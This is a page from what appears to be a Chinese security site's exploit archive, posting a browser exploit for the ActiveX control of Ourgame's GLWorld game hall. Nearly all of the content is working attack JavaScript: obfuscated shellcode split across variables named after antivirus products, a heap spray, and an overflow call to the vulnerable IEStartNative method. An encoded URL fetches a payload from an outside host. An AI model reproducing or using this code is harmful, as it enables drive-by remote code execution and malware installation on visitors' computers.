首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
联众世界的游戏大厅主程序GLWorld的ActiveX控件exploit
来源:www.vfcocus.net 作者:vfocus 发布时间:2008-05-04  
<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
document.writeln("<object classid=\"clsid:61F5C358-60FB-4A23-A312-D2B556620F20\" style=\'display:none\' id=\'Kazakh\'><\/object>");
document.writeln("<SCRIPT language=\"javascript\">");
document.writeln("var Wolfdalef,Wolfdalek,QuadroXFX;");
document.writeln("var Samsunga1,Samsunga2,Samsunga3,Samsunga4,Samsunga5,Samsunga6,Samsunga7;");
document.writeln("var Yorkfie1d,Yorkfie2d,Yorkfie3d,Yorkfie4d,Yorkfie5d,Yorkfie6d,Yorkfie7d;");
document.writeln("Samsunga1 = unescape(\"%u16eb%u335b%u66c9%ua4b8%u6639%u0431%u414b%u6640%uf981%u008c%uf37c\");");
document.writeln("Yorkfie2d = unescape(\"%u9ab2%u9717%u053a%u7a6f%ud24f%u063a%u3d0a%ub470%uf594%uc4fc%uf7e2\");");
document.writeln("Yorkfie1d = unescape(\"%ub268%ub568%u63b4%ue72e%ue739%u1769%ue56f%ubcc6%uba29%u676f%ud14c\");");
document.writeln("Yorkfie5d = unescape(\"%uf0c5%u22c5%u804e%u2b36%u6ed8%u6db9%uf303%udfa2%ub186%u6151%ud5b5\");");
document.writeln("Samsunga4 = unescape(\"%ub739%ucd51%ud54b%uee54%uadc6%u54ac%ubd60%ube39%u01b4%uc12e%uc139\");");
document.writeln("Yorkfie3d = unescape(\"%ue987%u2c03%uf34d%u37f8%ufe3e%ubee3%u0ed2%u1f02%ue64f%u8964%u2764\");");
document.writeln("Samsunga6 = unescape(\"%ucd5c%u316e%uc76f%u0b0a%u826a%u5f6e%ucb7f%u8769%u83c6%u5d2d%ubdc5\");");
document.writeln("Yorkfie4d = unescape(\"%ud939%u8e5c%u4d36%u59b1%u0b26%u82e7%u813e%uce39%u5291%uce63%u23d2\");");
document.writeln("Yorkfie6d = unescape(\"%u9a5a%ub4ec%u74a0%u694e%u244a%u3015%u504f%u405e%u474e%u4414%u0956\");");
document.writeln("Samsunga3 = unescape(\"%udcb2%u0025%uc6b2%u2431%udace%ue83c%udcd1%ub339%u5639%uddc0%ud856\");");
document.writeln("Yorkfie7d = unescape(\"%u4a4d%u4a48%u095e%u4d54%u064e%u4b58%u4554%u5e5f%u030b%u475d%u2f5c\");");
document.writeln("Samsunga2 = unescape(\"%u05eb%ue5e8%uffff%u4dff%ua5f7%ua639%ucd66%uf109%u225d%u2138%ua779\");");
document.writeln("Samsunga5 = unescape(\"%uaa6e%uc3c6%uc439%u93c6%uc53d%u00fe%ua939%uae55%u0d17%ucf79%ub45c\");");
document.writeln("Samsunga7 = unescape(\"%u812b%u3b92%ubcc4%u9ffe%ue01d%udc38%u22b2%u98b4%ub729%ub069%ub368\");");
document.writeln("Wolfdalef = Samsunga1+Samsunga2+Samsunga3+Samsunga4+Samsunga5+Samsunga6+Samsunga7;");
document.writeln("Wolfdalek = Yorkfie1d+Yorkfie2d+Yorkfie3d+Yorkfie4d+Yorkfie5d+Yorkfie6d+Yorkfie7d;");
document.writeln("var MmUrl = unescape(\"%u7468%u7074%u2f3a%u752f%u6573%u3172%u332e%u2d33%u3232%u6e2e%u7465%u622f%u6b61%u632e%u7373%u0080\");");
document.writeln("QuadroXFX = Wolfdalef+Wolfdalek;");
document.writeln("var hgs = \"\\x49\\x45\";");
document.writeln("var Norton = 20;");
document.writeln("var Ewido = 245;");
document.writeln("Mcafee = new Array();");
document.writeln("var start = \"\\x53\\x74\\x61\\x72\\x74\";");
document.writeln("var AntiVir = unescape(\"%u9090\"+\"%u9090\");");
document.writeln("var Notify = \"\\x4e\\x61\\x74\\x69\\x76\\x65\";");
document.writeln("var hgs_startNotify = hgs+start+Notify;");
document.writeln("var DrWeb = Norton+QuadroXFX.length;");
document.writeln("while (AntiVir.length<DrWeb) AntiVir+=AntiVir;");
document.writeln("fillblock = AntiVir.substring(0, DrWeb);");
document.writeln("block = AntiVir.substring(0, AntiVir.length-DrWeb);");
document.writeln("while(block.length+DrWeb<0x40000) block = block+block+fillblock;");
document.writeln("VulObject=\"\\x47\\x4c\\x49\\x45\\x44\\x6f\\x77\\x6e\\x2e\\x49\\x45\\x44\\x6f\\x77\\x6e\\x2e\\x31\";");
document.writeln("for (x=0; x<300; x++) Mcafee[x] = block +QuadroXFX;");
document.writeln("var Kazakh=new ActiveXObject(VulObject);");
document.writeln("var x =  unescape(\"%0c%0c%0c%0c\");");
document.writeln("while (x.length<Ewido) x += x;");
document.writeln("Kazakh[hgs_startNotify](x,\"AA\",\"AA\");");
document.writeln("<\/script>");
</SCRIPT>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HLDS WebMod 0.48 (rconpass) R
·Scout Portal Toolkit <= 1.4.0
·Microsoft Works 7 WkImgSrv.dll
·DeluxeBB <= 1.2 Multiple Remot
·Joomla Component Webhosting (c
·GroupWise 7.0 (mailto: scheme)
·迅雷本地溢出POC
·MS Windows XP SP2 (win32k.sys)
·Galleristic 1.0 (index.php cat
·VLC 0.8.6d httpd_FileCallBack
·OneCMS 2.5 Remote Blind SQL In
·HP Software Update (Hpufunctio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved